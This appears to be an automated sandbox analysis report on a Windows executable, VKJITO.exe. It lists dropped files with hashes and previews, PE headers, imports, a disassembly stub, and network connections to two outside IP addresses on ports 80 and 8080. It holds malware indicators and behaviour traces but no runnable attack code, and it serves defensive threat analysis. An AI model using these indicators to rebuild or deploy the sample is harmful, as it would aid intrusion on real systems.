                                        Category:dropped
                                        Size (bytes):217137
                                        Entropy (8bit):5.068335381017074
                                        Encrypted:false
                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):254875
                                        Entropy (8bit):5.003842588822783
                                        Encrypted:false
                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                        MD5:377B3E355414466F3E3861BCE1844976
                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):344303
                                        Entropy (8bit):5.023195898304535
                                        Encrypted:false
                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250983
                                        Entropy (8bit):5.057714239438731
                                        Encrypted:false
                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):51826
                                        Entropy (8bit):5.541375256745271
                                        Encrypted:false
                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):47296
                                        Entropy (8bit):6.42327948041841
                                        Encrypted:false
                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):34415
                                        Entropy (8bit):7.352974342178997
                                        Encrypted:false
                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):3465076
                                        Entropy (8bit):7.898517227646252
                                        Encrypted:false
                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):24
                                        Entropy (8bit):2.9993896755123957
                                        Encrypted:false
                                        SSDEEP:3:QDOLRMlW8Gn:Q6VMlW8G
                                        MD5:01FBC8EAAB7AC6E4BAE9C8BFF8577681
                                        SHA1:230A2E20F1CAFBEDDE01063CBA0FB40C81D1C966
                                        SHA-256:867B47C3C977F07C1905B3FBC883983FDF02E7F389AE7FA999B3CFCA7F5A2867
                                        SHA-512:AB1021D58DB2E32AA2137E399594609C65BD08D9A25FDDCD3E7028FF8989B6F42725C07CB443645D7916B2740989A83237359C242883E1EFC6E05E3FA989CABD
                                        Malicious:false
                                        Preview:..f.r.o.n.t.d.e.s.k.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............
                                        Process:C:\Users\user\Desktop\VKJITO.exe
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):11302
                                        Entropy (8bit):7.78963878169505
                                        Encrypted:false
                                        SSDEEP:192:oxrJWWLa/DWjTFQEnxkC7X8t53ZGND1FHGtShPjF3LyvyOmBKOEJrmsvAM3cO:oxrvm/SjTCsxH7X+pGND19GtUPpoxJO2
                                        MD5:FD69658D599611807EE4B8F3E42531BC
                                        SHA1:712DF7C90458621F01D3045EBAAF76455CDF279B
                                        SHA-256:3AFD75C39B4563F333B32F9D5C1119A84FF67596974E9C6B7AC59C7902F1CA81
                                        SHA-512:1893470F3E15A3FFC21F928D6EA1B8C2A59F8353D3ADBC0EA03A8697A5BDC2E0ACF544FAC55EA75A8E93F179EF0D771F352CE2687CBBB103EF3261939A1DD62B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):4.410469841215024
                                        Encrypted:false
                                        SSDEEP:3:0sk72906xkA/mJQxOfgSRGGXTkbblSu6YgOaaRNJn:0sU22aJ+2Gkb0u6YLaaRf
                                        MD5:8136470302121CD75C9B2726C3E9B277
                                        SHA1:A5CF8F1EE9BAE1AE495CD1BB0A89DB36FB7850D0
                                        SHA-256:ABB3B667AB0BA119C9D6E843FBEA473176B4D5F3A63979CF742B1324655C90D3
                                        SHA-512:725838F57F6D99F10106AC8CDC070C996D489446E33D16E630F2CDAF856218472B2C00E309C8E82167AEED3B64E62795FCB4CC61F80C00A092B3640247264574
                                        Malicious:false
                                        Preview:..........................................................N.@|.I~b...........[Content_Types].xml...n.0.E......Ub.*..>.-....3..~.aQ........Q....}..k.....U...=.j
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.416689389801054
                                        Encrypted:false
                                        SSDEEP:6144:ycifpi6ceLPL9skLmb0mLSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:fi58LSWIZBk2MM6AFBEo
                                        MD5:9D496CA6834E4B19FB0A81F74E2407D9
                                        SHA1:3F9B02BA666FC768305F2109D9F75093D15AAF93
                                        SHA-256:8151379EF55EB2AFB017F396AB2A4273D387EF8130BC7F8877B30AC783970811
                                        SHA-512:B71D04DD6F8C6B0A7587FC66F9AD5C13EAC2A0561589AF13EA6EE1FA393B8D46274B4ECC8314FAD9567C96F67219B23FF98EE8594150D7C1DDCD09064C10E30B
                                        Malicious:false
                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm../.aQ................................................................................................................................................................................................................................................................................................................................................8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):6.476037002247636
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:VKJITO.exe
                                        File size:505'856 bytes
                                        MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
                                        SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
                                        SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
                                        SHA512:aa82c0becd41cb8bd5ef45a352fcf4e7432495041d0b36687f02bb95705e61fa017b018a016c615271c7d670cef113bbe87285baebf2d0de2e845c18f1270939
                                        SSDEEP:6144:/6WW4uEbwm8kZ/w2FmOblG/h88OfGJUiuWtgPleGJEdpVNeOo:/6VYdNpmKlG5XqJGgPkG
                                        TLSH:F9B4E9316A1524B9E2EAC0744249856365397C8DD729B9FB01E4B2342FB7FF71B3A60C
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n(^..{^..{^..{W..{R..{O&.z\..{O&.z]..{O&.zW..{O&.zI..{...zV..{...zE..{^..{'..{^..{...{.&.{_..{.&.z_..{Rich^..{...............
                                        Icon Hash:0b03084c4e4e0383
                                        Entrypoint:0x14004a5b0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x67610374 [Tue Dec 17 04:52:04 2024 UTC]
                                        TLS Callbacks:0x4000d750, 0x1, 0x4003a6f0, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:e181d703c1ccac643c75df695343568f
                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        call 00007FA33C8432F8h
                                        dec eax
                                        add esp, 28h
                                        jmp 00007FA33C842E87h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        nop word ptr [eax+eax+00000000h]
                                        dec eax
                                        sub esp, 10h
                                        dec esp
                                        mov dword ptr [esp], edx
                                        dec esp
                                        mov dword ptr [esp+08h], ebx
                                        dec ebp
                                        xor ebx, ebx
                                        dec esp
                                        lea edx, dword ptr [esp+18h]
                                        dec esp
                                        sub edx, eax
                                        dec ebp
                                        cmovb edx, ebx
                                        dec esp
                                        mov ebx, dword ptr [00000010h]
                                        dec ebp
                                        cmp edx, ebx
                                        jnc 00007FA33C843028h
                                        inc cx
                                        and edx, 8D4DF000h
                                        wait
                                        add al, dh
                                        Programming Language:
                                        • [IMP] VS2008 SP1 build 30729
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66f34 | 0x104 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6c000 | 0x10b40 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x69000 | 0x2ec8 | .pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7d000 | 0x90c | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5f550 | 0x54 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x5f600 | 0x28 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5f410 | 0x140 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x4e000 | 0x450 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x4cb81 | 0x4cc00 | 59e645b10daf9e13e7e0365f93b46854 | False | 0.519213151465798 | data | 6.410429474183223 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x4e000 | 0x19f80 | 0x1a000 | d200ec812104f6b1e56c44927cc03075 | False | 0.39791165865384615 | data | 5.929914038965162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x68000 | 0x4c0 | 0x200 | b0a52caa26824fe2292684499e256f5c | False | 0.287109375 | data | 2.3402856607159674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .pdata | 0x69000 | 0x2ec8 | 0x3000 | 2f14aae3a7cccffffd7fde4a327f957b | False | 0.50146484375 | data | 5.598549220182398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc | 0x6c000 | 0x10b40 | 0x10c00 | c9ba3dce4a01b0233a1ee90428fde01f | False | 0.06862173507462686 | data | 4.631565874341215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x7d000 | 0x90c | 0xa00 | 05d74b2675f47a61dea3c5e26b019d48 | False | 0.5828125 | data | 5.226710425977709 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0x6c0e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/m | English | United States | 0.06374955637051934
                                        RT_GROUP_ICON | 0x7c910 | 0x14 | data | English | United States | 1.15
                                        RT_VERSION | 0x7c924 | 0x21c | data | English | United States | 0.5148148148148148
                                        DLL | Import
                                        bcrypt.dll | BCryptGenRandom
                                        KERNEL32.dll | SetLastError, lstrlenW, GetModuleHandleW, FormatMessageW, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, LoadLibraryA, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, GetEnvironmentVariableW, CreateFileW, SetFileInformationByHandle, IsDebuggerPresent, VirtualProtect, VirtualAlloc, ConvertThreadToFiber, CreateFiber, SwitchToFiber, ReleaseSRWLockExclusive, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, QueryPerformanceCounter, AcquireSRWLockExclusive, GetEnvironmentStringsW, DuplicateHandle, WriteFileEx, SleepEx, GetExitCodeProcess, TryAcquireSRWLockExclusive, QueryPerformanceFrequency, AcquireSRWLockShared, ReleaseSRWLockShared, CreateEventW, ReadFile, GetOverlappedResult, CancelIo, GetLastError, GetProcAddress, ExitProcess, GetFullPathNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateThread, GetSystemTimeAsFileTime, HeapReAlloc, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleMode, GetModuleFileNameW, HeapFree, GetCurrentThread, SetThreadStackGuarantee, AddVectoredExceptionHandler, Sleep, CloseHandle, WaitForSingleObject, SetWaitableTimer, SetUnhandledExceptionFilter, CreateWaitableTimerExW, UnhandledExceptionFilter, InitializeSListHead, GetCurrentThreadId, GetStdHandle, IsProcessorFeaturePresent
                                        ADVAPI32.dll | RegQueryValueExW, SystemFunction036, RegCloseKey, RegOpenKeyExW
                                        api-ms-win-core-synch-l1-2-0.dll | WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                        ntdll.dll | RtlNtStatusToDosError, NtReadFile, NtWriteFile
                                        VCRUNTIME140.dll | __current_exception, __C_specific_handler, __current_exception_context, memmove, __CxxFrameHandler3, memset, memcmp, memcpy, _CxxThrowException
                                        api-ms-win-crt-string-l1-1-0.dll | strlen
                                        api-ms-win-crt-heap-l1-1-0.dll | free, _set_new_mode
                                        api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
                                        api-ms-win-crt-runtime-l1-1-0.dll | __p___argv, __p___argc, _cexit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _register_thread_local_exe_atexit_callback, terminate, _crt_atexit, _initialize_onexit_table, _register_onexit_function, _exit
                                        api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
                                        api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 18, 2024 16:30:08.677205086 CET | 49703 | 80 | 192.168.2.7 | 104.26.13.31
                                        Dec 18, 2024 16:30:08.797432899 CET | 80 | 49703 | 104.26.13.31 | 192.168.2.7
                                        Dec 18, 2024 16:30:08.797523975 CET | 49703 | 80 | 192.168.2.7 | 104.26.13.31
                                        Dec 18, 2024 16:30:08.797844887 CET | 49703 | 80 | 192.168.2.7 | 104.26.13.31
                                        Dec 18, 2024 16:30:08.917313099 CET | 80 | 49703 | 104.26.13.31 | 192.168.2.7
                                        Dec 18, 2024 16:30:09.988233089 CET | 80 | 49703 | 104.26.13.31 | 192.168.2.7
                                        Dec 18, 2024 16:30:10.007034063 CET | 49703 | 80 | 192.168.2.7 | 104.26.13.31
                                        Dec 18, 2024 16:30:10.128218889 CET | 80 | 49703 | 104.26.13.31 | 192.168.2.7
                                        Dec 18, 2024 16:30:10.128294945 CET | 49703 | 80 | 192.168.2.7 | 104.26.13.31
                                        Dec 18, 2024 16:30:11.590065956 CET | 49705 | 8080 | 192.168.2.7 | 139.159.139.109
                                        Dec 18, 2024 16:30:11.709623098 CET | 8080 | 49705 | 139.159.139.109 | 192.168.2.7
                                        Dec 18, 2024 16:30:11.709692955 CET | 49705 | 8080 | 192.168.2.7 | 139.159.139.109
                                        Dec 18, 2024 16:30:11.709899902 CET | 49705 | 8080 | 192.168.2.7 | 139.159.139.109
                                        Dec 18, 2024 16:30:11.829567909 CET | 8080 | 49705 | 139.159.139.109 | 192.168.2.7
                                        Dec 18, 2024 16:30:16.584249020 CET | 8080 | 49705 | 139.159.139.109 | 192.168.2.7
                                        Dec 18, 2024 16:30:16.584481955 CET | 49705 | 8080 | 192.168.2.7 | 139.159.139.109
                                        Dec 18, 2024 16:30:16.644712925 CET | 49705 | 8080 | 192.168.2.7 | 139.159.139.109
                                        Dec 18, 2024 16:30:16.764419079 CET | 8080 | 49705 | 139.159.139.109 | 192.168.2.7
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
